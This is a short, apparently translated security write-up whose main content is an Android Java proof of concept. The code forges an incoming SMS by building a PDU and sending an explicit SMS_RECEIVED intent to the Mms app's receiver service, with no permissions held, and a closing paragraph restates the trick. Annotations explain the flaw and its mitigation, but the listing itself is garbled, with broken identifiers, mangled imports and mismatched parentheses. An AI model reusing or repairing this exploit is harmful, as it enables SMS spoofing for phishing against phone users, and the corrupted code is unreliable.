0x01
This was discovered by the famous professor Jiang. The principle is simple and interesting.
0x02 code implementation
Java code
package com. smstrick;

import java. io. byteArrayOutputStream;
import java. io. IOException;
import java. lang. reflect. method;
import java. util. calendar;
import java. util. gregorianCalendar;
import android. app. activity;
import android. content. context;
import android. content. intent;
import android. OS. bundle;
import android. telephony. phoneNumberUtils;
import android. util. log;
import android. view. view;
import android. view. view. onClickListener;
import android. widget. editText;

/**
 * Proof-of-concept activity from the write-up above. It takes a sender number and a
 * message text from two EditText fields, builds a GSM SMS PDU for them entirely inside
 * this process, and hands that PDU to the Mms app's SmsReceiverService through an
 * explicit Intent that carries the SMS_RECEIVED action. The surrounding text states
 * that the message then shows up as a received SMS without this app holding any
 * permission.
 *
 * NOTE(review): this listing is an extraction-garbled transcription (lower-cased import
 * names, split identifiers such as "calendar ar", "Cal Endar", "fig Ss" and
 * "IOExcep Tion", a boxed "Byte [] pdu", "60x1000", missing parentheses). It does not
 * compile as printed and is kept as documentation of the technique, not as working code.
 *
 * Defender's view: the weakness demonstrated is a component that accepts "received SMS"
 * data from any local caller rather than only from the telephony stack. The mitigation
 * is on the receiving side (do not expose such a service to third-party apps, or guard it
 * with a privileged permission); from the analysis side, an app that sends
 * SMS_RECEIVED-shaped intents at another app's component is itself a useful indicator.
 * The write-up names no platform release; presumably later releases no longer accept
 * this path — confirm against the current platform before drawing conclusions.
 */
public class SMSTrickActivity extends Activity implements OnClickListener {
    /**
     * Called when the activity is first created: inflates the layout and makes this
     * activity the click handler of button1 (all the work happens in onClick).
     */
    @ Override
    public void onCreate (Bundle savedInstanceState) {
        super. onCreate (savedInstanceState);
        setContentView (R. layout. main);
        View continue_button = this. findViewById (R. id. button1);
        continue_button.setOnClickListener (OnClickListener) this);
    }

    /**
     * Button handler: reads the sender number (editText1) and the message body
     * (editText2) verbatim from the UI and forwards them to createFakeSms().
     * An empty sender field is replaced by the hard-coded "123456".
     *
     * @param v the clicked view (unused)
     */
    public void onClick (View v) {
        EditText eNum;
        EditText eMsg;
        String sNum;
        String sMsg;
        eNum = (EditText) findViewById (R. id. editText1);
        eMsg = (EditText) findViewById (R. id. editText2);
        sNum = eNum. getText (). toString ();
        sMsg = eMsg. getText (). toString ();
        // sNum cannot be blank
        if (sNum. equals ("") sNum = "123456";
        createFakeSms (this. getApplicationContext (), sNum, sMsg);
    }

    /**
     * Assembles an SMS PDU for the given sender and body and delivers it to the Mms
     * app's SmsReceiverService as if it had come from the network.
     *
     * The byte layout written to the stream below (SMSC address, first octet, sender
     * address, PID/DCS, 7-octet timestamp, 7-bit packed text) presumably follows the
     * SMS-DELIVER TPDU format of 3GPP TS 23.040 — not stated on the page, confirm
     * against the spec before treating any of the per-byte comments as authoritative.
     *
     * Error handling is best-effort only: both catch blocks just print the trace. If the
     * reflective 7-bit packing fails, the PDU is still emitted, merely without a body; if
     * the outer write fails, pdu stays null and the "pdus" extra carries a null entry.
     *
     * @param context used only to call startService()
     * @param sender  originating number as typed by the user, BCD-packed below
     * @param body    message text as typed by the user
     */
    private static void createFakeSms (Context context, String sender, String body) {
        // Source: http://stackoverflow.com/a/12338541
        // Source: http://blog.dev001.net/post/14085892020/android-generate-incoming-sms-from-within-your-app
        Byte [] pdu = null;
        // Dummy service-centre address; its length is written first (lsmcs).
        byte [] scBytes = PhoneNumberUtils. networkPortionToCalledPartyBCD ("0000000000");
        byte [] senderBytes = PhoneNumberUtils. networkPortionToCalledPartyBCD (sender);
        int lsmcs = scBytes. length;
        // Timestamp built from the current wall clock; each field is passed through
        // reverseByte(), i.e. nibble-swapped (presumably the semi-octet order the
        // timestamp field expects — confirm). Note that YEAR is the full calendar year
        // cast to a byte, and the last octet combines ZONE_OFFSET and DST_OFFSET.
        byte [] dateBytes = new byte [7];
        Calendar calendar = new GregorianCalendar ();
        dateBytes [0] = reverseByte (byte) (calendar. get (Calendar. YEAR);
        dateBytes [1] = reverseByte (byte) (calendar ar. get (Cal Endar. MONTH) + 1);
        dateBytes [2] = reverseByte (byte) (calendar ar. get (Calendar. DAY_OF_MONTH);
        dateBytes [3] = reverseByte (byte) (calendar ar. get (Calendar. HOUR_OF_DAY);
        dateBytes [4] = reverseByte (byte) (calendar ar. get (Calendar. MINUTE);
        dateBytes [5] = reverseByte (byte) (calendar ar. get (Calendar. SECOND);
        dateBytes [6] = reverseByte (byte) (calendar ar. get (Calendar. ZONE_OFFSET) + calendar. get (Calendar. D ST_OFFSET)/(60x1000*15);
        try {
            // Leftover debug logging from the original author.
            Log. d ("ice", "test one");
            ByteArrayOutputStream bo = new ByteArrayOutputStream ();
            bo. write (lsmcs);                  // SMSC address length
            bo. write (scBytes);                // SMSC address (dummy)
            bo. write (0x04);                   // first octet — presumably SMS-DELIVER type indicator; confirm
            bo. write (byte) sender. length (); // sender address length (digit count, not BCD byte count)
            bo. write (senderBytes);            // sender address, BCD
            bo. write (0x00);                   // presumably protocol identifier; confirm
            bo. write (0x00); // encoding: 0 for default 7bit
            bo. write (dateBytes);              // service-centre timestamp, see above
            try {
                // The body is 7-bit packed by reflectively calling a hidden platform
                // class (name mangled by extraction here). Hidden-API reflection is
                // fragile across releases, which is why the call is wrapped separately.
                String sReflectedClassName = "com. android. internal. telephony. gsmAlphabet ";
                fig Ss cReflectedNFCExtras = Class. forName (sReflectedClassName);
                Method stringToGsm7BitPacked = cReflectedNFCExtras. getMethod ("stringToGsm7BitPacked", new Class [] {String. class});
                stringToGsm7BitPacked. setAccessible (true);
                byte [] bodybytes = (byte []) stringToGsm7BitPacked. invoke (null, body);
                bo. write (bodybytes);
            } catch (Exception e) {
                // Swallowed: the PDU is still built, just without the text part.
                e. printStackTrace ();
            }
            pdu = bo. toByteArray ();
        } catch (IOExcep Tion e) {
            // Swallowed: pdu remains null here.
            e. printStackTrace ();
        }
        // The crux of the trick: an explicit Intent aimed at the Mms app's own service,
        // carrying the same action and "pdus" extra shape the system SMS broadcast uses.
        // Nothing here proves the caller is the telephony stack — the receiving service
        // has to trust whatever it is handed. The "format" extra is left out.
        Intent intent = new Intent ();
        intent. setClassName ("com. android. mms "," com. android. mms. transaction. smsReceiverService ");
        intent. setAction ("android. provider. telephony. SMS_RECEIVED ");
        intent. putExtra ("pdus", new Object [] {pdu});
        // intent. putExtra ("format", "3gpp");
        context. startService (intent);
    }

    /**
     * Swaps the two nibbles of B; used for the semi-octet fields of the timestamp above.
     * As printed, the expression uses comparison operators and will not compile — treat
     * it as part of the transcription damage noted on the class.
     *
     * @param B the byte whose nibbles are to be swapped
     * @return B with high and low nibble exchanged (intended behaviour)
     */
    private static byte reverseByte (byte B) {
        return (byte) (B & 0xF0)> 4 | (B & 0x0F) <4) ;
    }
}
0x03 The core of the substantive analysis is to customize the system's Intent intent = new Intent (); intent. setClassName ("com. android. mms "," com. android. mms. transaction. smsReceiverService "); intent. setAction ("android. 
provider. telephony. SMS_RECEIVED "); intent. putExtra ("pdus", new Object [] {pdu}); // intent. putExtra ("format", "3gpp"); context. startService (intent); — that is, to hand-build the very intent the messaging app's service receives for an incoming SMS and deliver it directly, so the SMS is forged without the app holding any permission.